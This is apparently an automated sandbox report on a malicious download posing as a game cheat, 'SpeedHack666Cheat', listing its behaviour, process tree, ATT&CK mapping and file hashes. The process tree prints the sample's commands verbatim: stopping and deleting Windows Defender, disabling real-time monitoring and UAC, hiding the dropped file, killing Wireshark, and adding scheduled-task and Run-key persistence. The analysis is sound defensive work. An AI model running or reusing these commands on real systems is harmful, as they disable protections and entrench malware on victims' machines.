Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
14-10-2024 16:22
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://wdfiles.ru/29J7Q
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
https://wdfiles.ru/29J7Q
Resource
win11-20241007-en
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation SpeedHack666Cheat (no VM detected).exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\87078a174f1e0ed9d58afdf2d6d178c3.exe dllhost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\87078a174f1e0ed9d58afdf2d6d178c3.exe dllhost.exe -
Executes dropped EXE 3 IoCs
pid Process 4544 SpeedHack666Cheat (no VM detected).exe 3276 dllhost.exe 1808 dllhost.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\87078a174f1e0ed9d58afdf2d6d178c3 = "\"C:\\ProgramData\\dllhost.exe\" .." dllhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\87078a174f1e0ed9d58afdf2d6d178c3 = "\"C:\\ProgramData\\dllhost.exe\" .." dllhost.exe -
pid Process 764 powershell.exe -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4232 sc.exe 1572 sc.exe 916 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SpeedHack666Cheat (no VM detected).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Kills process with taskkill 1 IoCs
pid Process 2696 taskkill.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2448 reg.exe -
NTFS ADS 2 IoCs
description ioc Process File created C:\ClickMe.exe\:SmartScreen:$DATA SpeedHack666Cheat (no VM detected).exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 929749.crdownload:SmartScreen msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3324 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1084 msedge.exe 1084 msedge.exe 3936 msedge.exe 3936 msedge.exe 2564 identity_helper.exe 2564 identity_helper.exe 3908 msedge.exe 3908 msedge.exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe 4544 SpeedHack666Cheat (no VM detected).exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3276 dllhost.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
description pid Process Token: SeDebugPrivilege 4544 SpeedHack666Cheat (no VM detected).exe Token: SeDebugPrivilege 3276 dllhost.exe Token: SeDebugPrivilege 764 powershell.exe Token: SeDebugPrivilege 2696 taskkill.exe Token: 33 3276 dllhost.exe Token: SeIncBasePriorityPrivilege 3276 dllhost.exe Token: 33 3276 dllhost.exe Token: SeIncBasePriorityPrivilege 3276 dllhost.exe Token: 33 3276 dllhost.exe Token: SeIncBasePriorityPrivilege 3276 dllhost.exe Token: 33 3276 dllhost.exe Token: SeIncBasePriorityPrivilege 3276 dllhost.exe Token: 33 3276 dllhost.exe Token: SeIncBasePriorityPrivilege 3276 dllhost.exe Token: 33 3276 dllhost.exe Token: SeIncBasePriorityPrivilege 3276 dllhost.exe Token: 33 3276 dllhost.exe Token: SeIncBasePriorityPrivilege 3276 dllhost.exe Token: SeDebugPrivilege 1808 dllhost.exe Token: 33 3276 dllhost.exe Token: SeIncBasePriorityPrivilege 3276 dllhost.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe 3936 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3936 wrote to memory of 2064 3936 msedge.exe 83 PID 3936 wrote to memory of 2064 3936 msedge.exe 83 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1008 3936 msedge.exe 85 PID 3936 wrote to memory of 1084 3936 msedge.exe 86 PID 3936 wrote to memory of 1084 3936 msedge.exe 86 PID 3936 wrote to memory of 1076 3936 msedge.exe 87 PID 3936 wrote to memory of 1076 3936 msedge.exe 87 PID 3936 wrote to memory of 1076 3936 msedge.exe 87 PID 3936 wrote to memory of 1076 3936 msedge.exe 87 PID 3936 wrote to memory of 1076 3936 msedge.exe 87 PID 3936 wrote to memory of 1076 3936 msedge.exe 87 PID 3936 wrote to memory of 1076 3936 msedge.exe 87 PID 3936 wrote to memory of 1076 3936 msedge.exe 87 PID 3936 wrote to memory of 1076 3936 msedge.exe 87 PID 3936 wrote to memory of 1076 3936 msedge.exe 87 PID 3936 wrote to memory of 1076 3936 msedge.exe 87 PID 3936 wrote to memory of 1076 3936 msedge.exe 87 PID 3936 wrote to memory of 1076 3936 msedge.exe 87 PID 3936 wrote to memory of 1076 3936 msedge.exe 87 PID 3936 wrote to memory of 1076 3936 msedge.exe 87 PID 3936 wrote to memory of 1076 3936 msedge.exe 87 PID 3936 wrote to memory of 1076 3936 msedge.exe 87 PID 3936 wrote to memory of 1076 3936 msedge.exe 87 PID 3936 wrote to memory of 1076 3936 msedge.exe 87 PID 3936 wrote to memory of 1076 3936 msedge.exe 87 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4528 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://wdfiles.ru/29J7Q1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3936 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc86bc46f8,0x7ffc86bc4708,0x7ffc86bc47182⤵PID:2064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,2811182046731072103,6197357500340795349,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:22⤵PID:1008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,2811182046731072103,6197357500340795349,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:1084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,2811182046731072103,6197357500340795349,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:82⤵PID:1076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2811182046731072103,6197357500340795349,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:12⤵PID:1848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2811182046731072103,6197357500340795349,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:12⤵PID:4468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,2811182046731072103,6197357500340795349,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5236 /prefetch:82⤵PID:4900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,2811182046731072103,6197357500340795349,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5236 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2811182046731072103,6197357500340795349,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:12⤵PID:2612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2811182046731072103,6197357500340795349,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4788 /prefetch:12⤵PID:1244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2811182046731072103,6197357500340795349,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3508 /prefetch:12⤵PID:1288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2811182046731072103,6197357500340795349,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:12⤵PID:4804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2811182046731072103,6197357500340795349,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:12⤵PID:388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2140,2811182046731072103,6197357500340795349,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5484 /prefetch:82⤵PID:3156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,2811182046731072103,6197357500340795349,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2480 /prefetch:12⤵PID:1740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,2811182046731072103,6197357500340795349,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6288 /prefetch:82⤵PID:704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,2811182046731072103,6197357500340795349,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4936 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3908
-
-
C:\Users\Admin\Downloads\SpeedHack666Cheat (no VM detected).exe"C:\Users\Admin\Downloads\SpeedHack666Cheat (no VM detected).exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4544 -
C:\ProgramData\dllhost.exe"C:\ProgramData\dllhost.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3276 -
C:\Windows\SysWOW64\attrib.exeattrib +h "C:\ProgramData\dllhost.exe"4⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4528
-
-
C:\Windows\SysWOW64\cmd.execmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true4⤵
- System Location Discovery: System Language Discovery
PID:2580 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:764
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc query windefend4⤵
- System Location Discovery: System Language Discovery
PID:1748 -
C:\Windows\SysWOW64\sc.exesc query windefend5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4232
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc stop windefend4⤵
- System Location Discovery: System Language Discovery
PID:1600 -
C:\Windows\SysWOW64\sc.exesc stop windefend5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete windefend4⤵
- System Location Discovery: System Language Discovery
PID:4344 -
C:\Windows\SysWOW64\sc.exesc delete windefend5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:916
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn CleanSweepCheck /f4⤵
- System Location Discovery: System Language Discovery
PID:2100
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn CleanSweepCheck /tr C:\ProgramData\dllhost.exe4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3324
-
-
C:\Windows\SysWOW64\cmd.execmd /c reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- System Location Discovery: System Language Discovery
PID:3440 -
C:\Windows\SysWOW64\reg.exereg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2448
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Wireshark.exe4⤵
- System Location Discovery: System Language Discovery
PID:3904 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Wireshark.exe5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2696
-
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2252
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1424
-
C:\ProgramData\dllhost.exeC:\ProgramData\dllhost.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1808
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
2Disable or Modify Tools
1Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD5b8880802fc2bb880a7a869faa01315b0
SHA151d1a3fa2c272f094515675d82150bfce08ee8d3
SHA256467b8cd4aacac66557712f9843023dcedefcc26efc746f3e44157bc8dac73812
SHA512e1c6dba2579357ba70de58968b167d2c529534d24bff70568144270c48ac18a48ee2af2d58d78ae741e5a36958fa78a57955bd2456f1df00b781fc1002e123d2
-
Filesize
152B
MD5ba6ef346187b40694d493da98d5da979
SHA1643c15bec043f8673943885199bb06cd1652ee37
SHA256d86eec91f295dfda8ed1c5fa99de426f2fe359282c7ebf67e3a40be739475d73
SHA5122e6cc97330be8868d4b9c53be7e12c558f6eb1ac2c4080a611ba6c43561d0c5bb4791b8a11a8c2371599f0ba73ed1d9a7a2ea6dee2ae6a080f1912e0cb1f656c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize1008B
MD5e5e8b459a93c4638644e9397c843095a
SHA1540bb300b98102833111e404d0387983b87149a9
SHA256217751eff250c12aa741c89264b32fcec40e31ed5b7e09ab6355ff81f74248c0
SHA512868c744a5b72dbcd79db58d27c97694f1eeb04e02a64fd21f1ceddd96d9651a44993bc564c2bd4946f9cd0db4c44f04cfbebd1b8de8054b0499627b6931933e4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\000\t\Paths\MANIFEST-000001
Filesize41B
MD55af87dfd673ba2115e2fcf5cfdb727ab
SHA1d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b
-
Filesize
1KB
MD5127d10d6b3c6f8b5f278bae29e6fabb8
SHA1d5c79a9dcbba19911d165fd93c283842b7511fbf
SHA256dc257a65d9d1e797ee73b00eaaf346cbd71563c91f77d35ff35fc01cc6f1f345
